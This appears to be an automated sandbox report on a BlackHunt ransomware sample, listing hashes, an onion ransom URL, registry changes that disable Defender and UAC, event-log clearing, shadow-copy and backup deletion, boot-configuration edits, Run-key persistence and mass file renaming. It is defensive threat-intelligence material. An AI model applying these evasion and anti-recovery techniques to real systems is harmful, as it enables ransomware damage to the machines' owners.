Analysis
-
max time kernel
118s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:40
Static task
static1
Behavioral task
behavioral1
Sample
1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe
Resource
win10v2004-20231215-en
General
-
Target
1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe
-
Size
707KB
-
MD5
cc7a81df71683402ba7a751b7e7aa923
-
SHA1
a838519630c00d82a4fde0e555c8a4a98e8bae8d
-
SHA256
1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c
-
SHA512
ae18ee37dbbbebb7d1f468b7fb6fe0a9833bad0c5c28a4a866abcb15a27b568286914c23eb12cc7a4ad6755df26c0d1a127a69f9000bddb33114a50ea67d5379
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1n81vnh:6uaTmkZJ+naie5OTamgEoKxLWOxh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2720 fsutil.exe 1780 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2372 wevtutil.exe 1712 wevtutil.exe 2708 wevtutil.exe 532 wevtutil.exe 236 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1472 bcdedit.exe 2576 bcdedit.exe 1632 bcdedit.exe 616 bcdedit.exe -
Renames multiple (2909) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2092 wbadmin.exe 2636 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1080 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\N: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\A: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\P: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\G: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\K: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\W: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\Y: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\I: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\J: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\R: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\S: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\H: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\L: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\Z: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\V: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\Q: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\E: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\U: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\B: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\T: 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\selection_subpicture.png 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#BlackHunt_ReadMe.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jre7\lib\security\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#BlackHunt_ReadMe.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#BlackHunt_ReadMe.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\release 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\#BlackHunt_ReadMe.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jre7\lib\security\#BlackHunt_Private.key 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#BlackHunt_ReadMe.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2900 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 684 vssadmin.exe 1548 vssadmin.exe 1360 vssadmin.exe 684 vssadmin.exe 1092 vssadmin.exe 2360 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 952 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 968 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2892 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeRestorePrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeBackupPrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeTakeOwnershipPrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeAuditPrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeSecurityPrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeIncBasePriorityPrivilege 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Token: SeBackupPrivilege 984 vssvc.exe Token: SeRestorePrivilege 984 vssvc.exe Token: SeAuditPrivilege 984 vssvc.exe Token: SeBackupPrivilege 1596 wbengine.exe Token: SeRestorePrivilege 1596 wbengine.exe Token: SeSecurityPrivilege 1596 wbengine.exe Token: SeSecurityPrivilege 2372 wevtutil.exe Token: SeSecurityPrivilege 236 wevtutil.exe Token: SeBackupPrivilege 2372 wevtutil.exe Token: SeBackupPrivilege 236 wevtutil.exe Token: SeSecurityPrivilege 532 wevtutil.exe Token: SeBackupPrivilege 532 wevtutil.exe Token: SeSecurityPrivilege 2708 wevtutil.exe Token: SeBackupPrivilege 2708 wevtutil.exe Token: SeSecurityPrivilege 1712 wevtutil.exe Token: SeBackupPrivilege 1712 wevtutil.exe Token: SeDebugPrivilege 952 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3040 wrote to memory of 2664 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 29 PID 3040 wrote to memory of 2664 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 29 PID 3040 wrote to memory of 2664 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 29 PID 3040 wrote to memory of 2664 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 29 PID 3040 wrote to memory of 2312 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 30 PID 3040 wrote to memory of 2312 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 30 PID 3040 wrote to memory of 2312 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 30 PID 3040 wrote to memory of 2312 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 30 PID 3040 wrote to memory of 2152 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 32 PID 3040 wrote to memory of 2152 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 32 PID 3040 wrote to memory of 2152 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 32 PID 3040 wrote to memory of 2152 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 32 PID 3040 wrote to memory of 2676 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 34 PID 3040 wrote to memory of 2676 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 34 PID 3040 wrote to memory of 2676 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 34 PID 3040 wrote to memory of 2676 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 34 PID 3040 wrote to memory of 2796 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 136 PID 3040 wrote to memory of 2796 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 136 PID 3040 wrote to memory of 2796 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 136 PID 3040 wrote to memory of 2796 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 136 PID 3040 wrote to memory of 2836 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 38 PID 3040 wrote to memory of 2836 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 38 PID 3040 wrote to memory of 2836 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 38 PID 3040 wrote to memory of 2836 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 38 PID 3040 wrote to memory of 2728 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 40 PID 3040 wrote to memory of 2728 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 40 PID 3040 wrote to memory of 2728 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 40 PID 3040 wrote to memory of 2728 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 40 PID 3040 wrote to memory of 2696 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 41 PID 3040 wrote to memory of 2696 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 41 PID 3040 wrote to memory of 2696 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 41 PID 3040 wrote to memory of 2696 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 41 PID 3040 wrote to memory of 2704 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 42 PID 3040 wrote to memory of 2704 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 42 PID 3040 wrote to memory of 2704 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 42 PID 3040 wrote to memory of 2704 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 42 PID 3040 wrote to memory of 2988 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 44 PID 3040 wrote to memory of 2988 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 44 PID 3040 wrote to memory of 2988 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 44 PID 3040 wrote to memory of 2988 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 44 PID 3040 wrote to memory of 2732 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 45 PID 3040 wrote to memory of 2732 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 45 PID 3040 wrote to memory of 2732 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 45 PID 3040 wrote to memory of 2732 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 45 PID 3040 wrote to memory of 2804 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 48 PID 3040 wrote to memory of 2804 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 48 PID 